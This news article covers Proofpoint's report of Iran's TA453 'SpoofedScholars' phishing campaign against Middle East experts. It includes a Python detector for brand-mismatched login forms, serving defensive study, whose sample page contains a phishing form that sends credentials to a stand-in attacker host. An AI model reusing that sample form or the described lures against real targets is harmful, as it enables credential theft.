2021-07-16

An Iranian cyber-espionage campaign using spoofed identities of academics at a UK university to harvest data from experts in Middle Eastern affairs has been uncovered.

Detailed by researchers at the cyber-security firm Proofpoint, the Iranian group was found to have compromised a real website affiliated with the School of Oriental and African Studies (SOAS), University of London, in an effort to deliver personalised credential-harvesting pages to targets under the guise of inviting them to a webinar on Middle Eastern issues.

In the campaign, dubbed “SpoofedScholars”, Proofpoint found that the attackers tried to build a rapport with their targets through invitations to fake conferences or events, and went as far as to request phone calls with them.

Proofpoint researchers linked the phishing campaign to an Advanced Persistent Threat (APT) group tracked as TA453 – also known as Charming Kitten and Phosphorus – which they assess with “high confidence” to be a state-backed intelligence-gathering operation connected to the Islamic Revolutionary Guard Corps (IRGC), a wing of Iran’s armed forces.

What makes the group’s latest campaign concerning is how quickly its tactics have grown in sophistication.

“TA453 typically uses actor controlled phishing pages to harvest their targets’ credentials, similar to the BadBlood campaign we reported on in March 2021,” said Sherrod DeGrippo, senior director of threat research and detection at Proofpoint.

“The use of a compromised site, especially one so topical like SOAS to TA453’s interest, is highly unusual and more sophisticated for this group,” she told TRT World.

In January 2021, emails sent from a Gmail address, purporting to come from a senior teaching and research fellow at SOAS, invited targets to an online conference called “The US Security Challenges in the Middle East”.

Once a conversation was established, targets were sent a “registration link” to a page hosted on the website of SOAS Radio, an independent online radio station based at SOAS, which the attackers had compromised. The page offered sign-in options branded as various email providers; whatever was typed into them, usernames and passwords included, was captured by the attackers. Because the page sat on a genuine SOAS-affiliated domain, URL reputation alone would not have flagged it; the tell was a third-party site asking for email-provider credentials.
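The mismatch described above, a page on one domain collecting credentials branded as another provider's, can be checked mechanically. The following is an added example written for this article, not code from Proofpoint or from the campaign; the sample HTML and hostnames are constructed for illustration, and the provider-to-domain table is an assumption to extend for your own environment. It parses every form on a page, and flags any form with a password field whose branding names a mail provider while the credentials would be posted to a host that provider does not own.

```python
"""Flag login forms that collect a mail provider's credentials from a host that is
not that provider's.  Added illustration; the provider table and sample pages are
constructed assumptions, not artefacts of the SpoofedScholars campaign."""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Assumed mapping: brand keyword shown on the page -> domains that legitimately
# receive that brand's credentials.  Extend for the providers you care about.
PROVIDER_DOMAINS = {
    "google": ("google.com",),
    "gmail": ("google.com",),
    "microsoft": ("microsoft.com", "microsoftonline.com", "live.com", "outlook.com"),
    "outlook": ("microsoft.com", "microsoftonline.com", "live.com", "outlook.com"),
    "yahoo": ("yahoo.com",),
    "icloud": ("apple.com", "icloud.com"),
}


def _belongs_to(host, domains):
    """True when host is one of the domains or a subdomain of one of them."""
    return any(host == d or host.endswith("." + d) for d in domains)


class _FormScanner(HTMLParser):
    """Collect, per <form>, its action, whether it holds a password field, and the
    text and attribute strings inside it (branding usually lives in img alt text,
    button labels, placeholders or image paths)."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._cur = None

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self._cur = {"action": a.get("action", ""), "password": False, "text": []}
            self.forms.append(self._cur)
            return
        if self._cur is None:
            return
        if tag == "input" and a.get("type", "").lower() == "password":
            self._cur["password"] = True
        keys = ("alt", "title", "placeholder", "value", "name", "class", "src")
        self._cur["text"].extend(a[k] for k in keys if a.get(k))

    def handle_endtag(self, tag):
        if tag == "form":
            self._cur = None

    def handle_data(self, data):
        if self._cur is not None:
            self._cur["text"].append(data)


def find_brand_mismatches(page_url, html):
    """Return [(brand, page_host, action_host), ...] for each password form whose
    branding names a provider but whose action would send credentials elsewhere."""
    scanner = _FormScanner()
    scanner.feed(html)
    page_host = (urlparse(page_url).hostname or "").lower()
    findings = []
    for form in scanner.forms:
        if not form["password"]:
            continue
        # Relative actions resolve against the page URL, so an empty or relative
        # action means the credentials go back to the hosting site itself.
        action_host = (urlparse(urljoin(page_url, form["action"])).hostname or "").lower()
        blob = " ".join(form["text"]).lower()
        for brand, domains in PROVIDER_DOMAINS.items():
            if brand in blob and not _belongs_to(action_host, domains):
                findings.append((brand, page_host, action_host))
    return findings


# Constructed sample: a "registration" page on a compromised third-party host that
# offers branded sign-in forms, one posting back to the host and one to a collector.
SAMPLE_PAGE_URL = "https://radio.example-university.test/webinar/register.html"
SAMPLE_HTML = """
<html><body>
<h1>Registration: The US Security Challenges in the Middle East</h1>
<p>Sign in with your email provider to confirm your place.</p>
<form action="login.php" method="post">
  <img src="logos/google.png" alt="Google">
  <input type="email" name="user" placeholder="Email">
  <input type="password" name="pass" placeholder="Password">
  <button>Sign in with Google</button>
</form>
<form action="https://collect.attacker.test/o" method="post">
  <img alt="Outlook" src="logos/outlook.png">
  <input type="text" name="user">
  <input type="password" name="pass">
</form>
</body></html>
"""

# Constructed control: the same branding on the provider's own host is not flagged.
SAMPLE_LEGIT_URL = "https://accounts.google.com/signin"
SAMPLE_LEGIT_HTML = """
<form action="/v3/signin/challenge" method="post">
  <img alt="Google"><input type="email" name="u"><input type="password" name="p">
</form>
"""

if __name__ == "__main__":
    for brand, host, action in find_brand_mismatches(SAMPLE_PAGE_URL, SAMPLE_HTML):
        print(f"{host}: '{brand}' credentials would be posted to {action}")
    print("legit page findings:", find_brand_mismatches(SAMPLE_LEGIT_URL, SAMPLE_LEGIT_HTML))
```

The check is deliberately keyed on the form's own contents rather than the whole page, so a site that merely mentions Google in a footer link beside its own login is not flagged. It is a heuristic for triage, not proof: a harvesting page can omit branding or submit via JavaScript, so treat a hit as a reason to look, and a miss as no assurance.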

It is unclear whether the attackers succeeded in stealing any information. Once notified, SOAS said that no personal data had been taken and that the compromised radio website was separate from its official website.